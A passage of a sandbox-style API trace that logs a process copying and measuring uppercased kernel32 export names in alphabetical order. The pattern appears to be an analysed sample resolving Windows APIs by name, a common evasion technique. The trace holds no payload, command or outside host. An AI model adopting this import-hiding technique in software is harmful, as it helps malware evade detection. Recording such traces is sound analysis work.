[0079.688] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.688] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.688] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.688] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.688] lstrlenA (lpString="COPYFILEA") returned 9 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.688] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.688] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.688] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.688] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.688] lstrlenA (lpString="COPYFILEW") returned 9 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.688] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.688] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.688] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.688] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.688] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.688] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.688] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.689] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.689] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.689] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.689] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.689] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.689] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.689] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.689] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.689] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.689] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.689] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.689] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.689] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.689] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.689] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.689] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.689] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.689] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.689] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.690] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.690] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.690] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.690] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.690] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.690] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.690] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.690] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.690] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.690] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.690] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.690] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.690] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.690] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.690] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.690] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.690] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.690] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.690] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.691] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.691] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.691] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.691] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.691] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.691] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.691] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.691] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.691] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.691] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.691] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.691] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.691] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.691] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.691] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.691] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.691] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.691] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.691] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.692] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.692] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.692] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.692] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.692] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.692] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.692] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.692] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.692] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.692] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.692] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.692] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.692] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.692] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.692] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.692] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.692] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.692] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.692] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.693] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.693] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.693] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.693] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.693] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.693] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.693] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.693] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.693] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.693] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.693] lstrlenA (lpString="DELETEATOM") returned 10 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.693] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.693] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.693] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.693] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.693] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.693] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.693] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.693] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.694] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.694] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.694] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.694] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.694] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.694] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.694] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.694] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.694] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.694] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.694] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.694] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.694] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.694] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.694] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.694] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.694] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.694] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.694] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.695] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.695] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.695] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.695] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.695] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.695] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.695] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.695] 